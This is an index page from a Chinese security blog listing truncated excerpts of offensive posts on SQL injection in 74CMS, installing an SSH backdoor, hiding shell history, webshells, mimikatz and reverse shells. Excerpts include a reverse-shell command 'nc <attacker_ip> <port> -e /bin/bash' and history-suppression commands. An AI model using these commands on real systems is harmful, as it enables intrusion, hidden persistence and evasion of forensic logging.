安全博客 - 第 806 | CN-SEC 中文网

Linux 入侵检测技巧知识

1. 登录ssh之后不记录history unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/...

11月21日moonsec_com341 views评论

阅读全文

moonsec_com

74CMS Sql注入漏洞一枚2

74CMS Sql注入漏洞一枚2 漏洞作者： ′ 雨。在plus/ajax_user.php中

11月21日419 views评论

阅读全文

教你ssh后门安装

首先需要root权限，取得root权限后放一个ssh后门，这样就算管理员改了root密码，你也可以通过这个sshbackdoor登入。。。 1、mv /etc/ssh/ssh_config /etc/...

11月21日moonsec_com660 views评论

阅读全文

C#常用字符串加密解密方法封装代码

//方法一 //须添加对System.Web的引用 //using System.Web.Security; /// <summary> /// SHA1加密字符串 /// </su...

11月21日moonsec_com308 views评论

阅读全文

moonsec_com

74CMS Sql 注入漏洞一枚1

漏洞作者： ′ 雨。在user/user_pms.php中 elseif($act=="add_save") { $setsqlarr['msgtype']=2; $setsq...

11月21日342 views评论

阅读全文

mysql搜索型注入盲注语句备份

先来说一点基础的东西。 php中和mysql 的一点基本的知识。大鸟飞过了 left() 从左向右截取 length()函数是计算括号中数据的长度，回显为纯数字，可以用大于小于和等...

11月21日moonsec_com393 views评论

阅读全文

linux下反弹Shell的五种方法

1. nc <attacker_ip> <port> -e /bin/bash 2. mknod backpipe p;...

11月21日moonsec_com477 views评论

阅读全文

moonsec_com

开源网站管理工具——Altman

Altman，the webshell tool，自己写的一款开源软件。 0×00前言之前用过几款webshell 工具，有B/C的也有C/S的，有的只能用于php或者aspx，...

11月21日295 views评论

阅读全文

moonsec_com

神器mimikatz2.0发布

mimikatz 最近发布了它的2.0版本，抓密码命令更加简单了，估计作者也看到了对它这个神器最多的研究就是直接抓密码，为神马不发布一个直接一键版，哈哈哈哈哈。新功能还包括能够通...

11月21日402 views评论

阅读全文

一个奇怪的ASP一句话

一句话代码： <script language="javascript" runat="server"> </script> 利用语句（参数a=）：

11月21日moonsec_com407 views评论

阅读全文

moonsec_com

CS渗透之绕过登陆

CS绕过登陆最近博客少了更新，今天抽空写一篇吧。大多数我们渗透都是针对b/s模型很少是针对c/s模型。

11月21日658 views评论

阅读全文

moonsec_com

云购cms注入漏洞利用工具

继续来福利了。之前写好的，一直放在内部群。如今0day 早已有人放出。工具也放出来吧。最近陆续发0day 发工具。

11月21日443 views评论

阅读全文

Linux 入侵检测技巧知识

74CMS Sql注入漏洞一枚2

教你ssh后门安装

C#常用字符串加密解密方法封装代码

74CMS Sql 注入漏洞一枚1

mysql搜索型注入盲注语句备份

linux下反弹Shell的五种方法

开源网站管理工具——Altman

神器mimikatz2.0发布

一个奇怪的ASP一句话

CS渗透之绕过登陆

云购cms注入漏洞利用工具

在线咨询

微信